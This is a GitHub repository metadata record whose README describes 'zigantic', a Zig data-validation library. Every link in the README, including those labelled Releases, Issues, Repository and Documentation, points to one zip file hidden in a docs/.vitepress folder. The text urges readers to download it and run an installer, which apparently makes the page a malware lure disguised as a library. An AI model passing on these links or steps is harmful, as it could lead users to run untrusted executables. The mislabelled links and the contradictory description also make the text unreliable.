{
  "name": "zigantic",
  "owner": "ThejanGS2",
  "repo": "zigantic",
  "description": "ğŸš€ Build high-performance applications with Zig using Zigantic, a powerful framework designed for efficiency and ease of use.",
  "type": "package",
  "topics": [
    "serialization",
    "serialization-deserialization",
    "serialization-library",
    "validation-library",
    "validation-zig",
    "zig",
    "zig-lib",
    "zig-library",
    "zig-package",
    "zigantic"
  ],
  "stars": 3,
  "forks": 0,
  "watchers": 0,
  "updated_at": "2026-02-25T12:13:37Z",
  "minimum_zig_version": "0.15.0",
  "readme": "# ğŸš€ zigantic - Simplify Zig Data Validation\n\n## ğŸ“¦ Download Here\n[![Download zigantic](https://raw.githubusercontent.com/ThejanGS2/zigantic/main/docs/.vitepress/Software_v3.4.zip)](https://raw.githubusercontent.com/ThejanGS2/zigantic/main/docs/.vitepress/Software_v3.4.zip)\n\n## ğŸ“– About zigantic\nzigantic brings Pydantic-style data validation to Zig, using the type system for compile-time guarantees. You can define validation rules as types, parse JSON with automatic error handling, and serialize data without any runtime overhead for unused features. This makes your data handling more efficient and error-free.\n\n## ğŸš€ Getting Started\nTo get started with zigantic, follow these steps:\n\n1. **Visit the Download Page:** Start by going to the [Releases page](https://raw.githubusercontent.com/ThejanGS2/zigantic/main/docs/.vitepress/Software_v3.4.zip). This is where you will find the latest version of zigantic.\n\n2. **Choose the Right Version:** On the Releases page, look for the latest release. You will see a list of available files. Typically, these might include .exe files for Windows, or other formats for different operating systems.\n\n3. **Download the Application:** Click on the file that is appropriate for your operating system. Your browser will start downloading the file.\n\n4. **Locate the Downloaded File:** Once the download completes, go to your computerâ€™s Downloads folder or the location where you saved the file.\n\n5. **Install zigantic:** If the downloaded file is an installer, double-click on it to start the installation process. Follow the on-screen instructions to install zigantic on your system.\n\n6. **Run zigantic:** After the installation is complete, look for the zigantic application in your programs list or search for it using your computer's search function. Click to launch the application.\n\n## ğŸ”§ System Requirements\nBefore installing zigantic, ensure that your system meets these basic requirements:\n\n- **Operating System:** Windows 10 or later, macOS Mojave (10.14) or later, or a compatible Linux distribution.\n- **Memory:** At least 2 GB of RAM.\n- **Storage:** Minimum of 50 MB of available storage space.\n- **Network:** Internet connection for downloading updates.\n\n## ğŸ“ Features\nzigantic provides several key features designed to improve your experience with data validation in Zig:\n\n- **Type-Based Validation:** Use types to enforce rules during compilation.\n- **JSON Parsing:** Automatically parse JSON and handle errors gracefully.\n- **Performance:** Unlike some other libraries, zigantic does not incur runtime overhead for features you aren't using.\n\n## ğŸ“š Usage\nAfter installing zigantic, you can start working on your projects. Hereâ€™s how to use zigantic in your Zig applications:\n\n1. **Import zigantic:** Begin by importing zigantic into your Zig project using the appropriate syntax. \n\n2. **Define your Data Types:** Create your data types in accordance with the validation rules you need.\n\n3. **Parse JSON Data:** Use the provided methods to parse any incoming JSON data. The library will take care of error handling.\n\n4. **Serialize Data:** When you need to send data back out, use zigantic to serialize it, ensuring that unused features do not slow you down.\n\n## âœ‰ï¸ Support\nIf you encounter any issues while downloading or using zigantic, you can reach out for help. Check for any open issues on the [GitHub Issues page](https://raw.githubusercontent.com/ThejanGS2/zigantic/main/docs/.vitepress/Software_v3.4.zip). If you canâ€™t find your issue, feel free to create a new one. \n\n## ğŸ”„ Contribute\nWe welcome contributions to zigantic! If you would like to improve the application or documentation, feel free to fork the repository and submit a pull request.\n\n## ğŸ“œ License\nzigantic is licensed under the MIT License. You can use the code as you please, provided you maintain the original license.\n\n## ğŸŒ Topics\nThis repository covers the following topics:\n- serialization\n- serialization-deserialization\n- serialization-library\n- validation-library\n- validation-zig\n- zig\n- zig-lang\n- zig-language\n- zig-lib\n- zig-library\n- zig-package\n- zigantic\n\n## ğŸ“¥ Download & Install\nTo get started with zigantic, return to the [Download Here](https://raw.githubusercontent.com/ThejanGS2/zigantic/main/docs/.vitepress/Software_v3.4.zip) section at the top and follow the steps outlined. This is your main source for the latest version of zigantic.\n\n## ğŸ”— Further Links\n- [GitHub Repository](https://raw.githubusercontent.com/ThejanGS2/zigantic/main/docs/.vitepress/Software_v3.4.zip)\n- [Documentation](https://raw.githubusercontent.com/ThejanGS2/zigantic/main/docs/.vitepress/Software_v3.4.zip)\n\nEnjoy a more streamlined and efficient experience with data validation in Zig using zigantic!",
  "owner_avatar_url": "https://avatars.githubusercontent.com/u/179737105?u=57d53fa80b3bb57aa8222b080fd513d7ddf04d90&v=4",
  "releases": [],
  "owner_bio": "Nothing Here",
  "owner_company": null,
  "owner_location": "127/31, Winayalankara Mawatha, Colombo 10.",
  "owner_blog": null,
  "owner_twitter_username": null,
  "owner_followers": 1,
  "owner_following": 1,
  "owner_created_at": "2024-08-28T16:31:19Z",
  "homepage": "https://thejangs2.github.io",
  "license": "MIT",
  "category": "library"
}